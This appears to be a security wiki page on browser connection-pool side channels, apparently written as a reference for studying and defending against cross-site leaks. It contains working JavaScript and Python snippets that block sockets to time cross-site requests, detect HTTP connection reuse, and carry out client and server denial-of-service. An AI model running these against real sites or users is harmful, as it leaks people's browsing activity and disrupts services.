Connection Pool

October 1, 2020

Another way to measure the network timing of a request is to abuse the socket pool of a browser [1]. Browsers use sockets to communicate with servers. Since the operating system and the hardware it runs on have limited resources, browsers impose a limit on how many sockets can be open at the same time.

To exploit the existence of this limit, attackers can:

  1. Check what the limit of the browser is, for example 256 global sockets for TCP and 6000 global sockets for UDP [2] [3].
  2. Block \(255\) sockets for a long period of time by performing \(255\) requests to different hosts that simply hang the connection, as in the client and server snippets below:
// Client: open 255 requests to different hosts; the server never answers,
// so each request keeps a socket occupied.
for (let i = 0; i < 255; i++) fetch('https://' + i + '.example.com/', {mode: "no-cors", cache: "no-store"});
# Server: hang every connection for a long time before responding,
# so the client's socket stays occupied.
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
import time

class handler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Sleep before answering to keep the connection open.
        time.sleep(100000)
        self.send_response(200)
        self.send_header('Cache-Control', 'no-store')
        self.end_headers()

# ThreadingHTTPServer so many hanging connections can be held concurrently.
with ThreadingHTTPServer(('', 8000), handler) as server:
    server.serve_forever()
  3. Use the \(256^{th}\) socket by performing a request to the target page.
  4. Perform a \(257^{th}\) request to another host. Since all the sockets are being used (in steps 2 and 3), this request must wait until the pool receives an available socket. This waiting period provides the attacker with the network timing of the \(256^{th}\) socket, which belongs to the target page. This works because the \(255\) sockets from step 2 are still blocked, so if the pool received an available socket, it must have been freed by the socket from step 3. The time to release the \(256^{th}\) socket is therefore directly tied to the time taken to complete the target request. A combined sketch of steps 3 and 4 follows the snippet below.
// Measure the network timing of a request and check whether an existing
// connection was reused.
performance.clearResourceTimings();
await fetch(location.href, {cache: "no-store"});
// Give the browser time to add the entry to the performance timeline.
await new Promise(r => setTimeout(r, 1000));
let data = performance.getEntries().pop();
// On a reused connection connectStart equals startTime (no new handshake).
let type = (data.connectStart === data.startTime) ? 'reused' : 'new';
console.log('Time spent: ' + data.duration + ' on ' + type + ' connection.');
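
A minimal sketch combining steps 3 and 4, assuming the \(255\) blocking requests from step 2 are already in flight; https://target.example/ stands for the target page and https://fast.attacker.example/ for an attacker-controlled host that answers quickly (both hostnames are placeholders):

// Step 3: occupy the last free socket with a request to the target page
// (not awaited, so it runs in the background).
fetch('https://target.example/', {mode: "no-cors", cache: "no-store"}).catch(() => {});

// Step 4: time a request to another, fast host. It can only start once the
// target request frees its socket, so its duration approximates the network
// timing of the target request.
let start = performance.now();
await fetch('https://fast.attacker.example/', {mode: "no-cors", cache: "no-store"});
console.log('Target request took roughly ' + (performance.now() - start) + ' ms.');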

Connection reuse #

With HTTP/1.1 (TCP), HTTP/2 (TCP) and HTTP/3 (UDP), requests may reuse an existing connection to a host to improve performance [4] [5]. HTTP/2 also has connection coalescing, which allows different hostnames that are served by the same web server to reuse a connection [6]. Connection reuse is currently keyed on whether credentials are included in the request. Since a reused connection is normally faster than a new one, this can be used to detect whether a site has connected to a host (excluding anything that was served from the cache), and to leak information about the cross-site request by abusing stream prioritization and HPACK compression [7].

Connections may get closed if they are left idle or the sockets are exhausted, for example at 256 connections for HTTP/2 or after 30 seconds of idling for HTTP/3 [2] [8]. This may also leak when the connection happened. The browser can additionally limit how many connections are allowed per host, for example 6 connections per host [2].

// Detect if an HTTP/3 request was made to a certain host in the last ~20 seconds:
// idle HTTP/3 connections are closed after 30 seconds, so wait 10 seconds and
// then check for connection reuse with isConnected() below.
await new Promise(r => setTimeout(r, 10000));

// Check for connection reuse when the response carries a Timing-Allow-Origin header.
async function isConnected(url) {
    performance.clearResourceTimings();
    try {
        await fetch(url, {
            cache: "no-store",
            credentials: "include"
        });
    } catch {}
    await new Promise(r => setTimeout(r, 1000));
    let data = performance.getEntries().pop();
    // Timing details are readable for same-origin requests or when the
    // Timing-Allow-Origin header is present.
    console.log("Protocol: " + data.nextHopProtocol);
    return (data.connectStart === data.startTime);
}

// Check for connection reuse when there is no Timing-Allow-Origin header (less reliable).
async function isConnected2(url, max = 50) {
    let start = performance.now();
    try {
        await fetch(url, {
            cache: "no-store",
            method: "GET",
            mode: "no-cors",
            credentials: "include"
        });
    } catch {}
    let duration = performance.now() - start;
    
    let start2 = performance.now();
    try {
        await fetch(url, {
            cache: "no-store",
            method: "GET",
            mode: "no-cors",
            credentials: "include"
        });
    } catch {}
    let duration2 = performance.now() - start2;
    // If the host was already connected, the first request does not pay the
    // connection setup cost, so the two durations are similar.
    return (duration - duration2 < max);
}

await isConnected2('https://example.com/404');
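
Connection coalescing can widen this signal: probing one hostname may reveal an existing connection to a different hostname served by the same server. A minimal sketch, assuming a.example.com and b.example.com are hypothetical hostnames covered by the same certificate and served from the same server:

// If the browser already holds a coalesced HTTP/2 connection to the shared
// server (for example from an earlier request to a.example.com), a probe to
// b.example.com may reuse it.
let coalesced = await isConnected('https://b.example.com/');
console.log('Existing (possibly coalesced) connection: ' + coalesced);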

Skipping dependencies #

If a connection is exhausted or too many sockets are open, requests for code from a host may fail, resulting in different observable behaviour. The following examples are by design a DoS attack on both the client and the server. Open a lot of sockets (ERR_CONNECTION_CLOSED, ERR_INSUFFICIENT_RESOURCES):

// Keep ~500 request chains alive, each repeatedly opening a socket,
// holding it for a short time and then aborting it.
for (let i = 0; i < 500; i++) request();

async function request() {
    let x = new AbortController();
    fetch('https://example.org', {
        mode: "no-cors",
        //credentials: 'include',
        cache: "no-store",
        signal: x.signal
    }).catch(() => {});
    await new Promise(r => setTimeout(r, 10));
    x.abort();
    request();
}

// Open the target in a popup while sockets are exhausted; its dependency requests may fail.
open('https://example.com', '', 'popup=1');

Overload a connection so that the browser never successfully sends requests to that host (ERR_CONNECTION_RESET):

// Continuously POST a large body so the connection stays overloaded.
let x = [...Array(1000000)].join(',');
request();
function request() {
    // Repeat whether the request succeeds or fails (e.g. ERR_CONNECTION_RESET).
    fetch('https://example.com', {mode: "no-cors", cache: "no-store", method: 'POST', body: x}).then(request, request);
}

Defense #

SameSite Cookies (Lax), COOP, Framing Protections, Isolation Policies

Similar to partitioned caches, some browsers are considering extending the principle of "split per site/origin" for resources to socket pools.

References #


  1. Leak cross-window request timing by exhausting connection pool, link
  2. client_socket_pool_manager.cc, link
  3. features.cc, link
  4. RFC 9113: Connection Reuse, link
  5. RFC 9114: Connection Reuse, link
  6. HTTP/2 Connection Coalescing, link
  7. RFC 9113: Remote Timing Attacks, link
  8. quic_context.h, link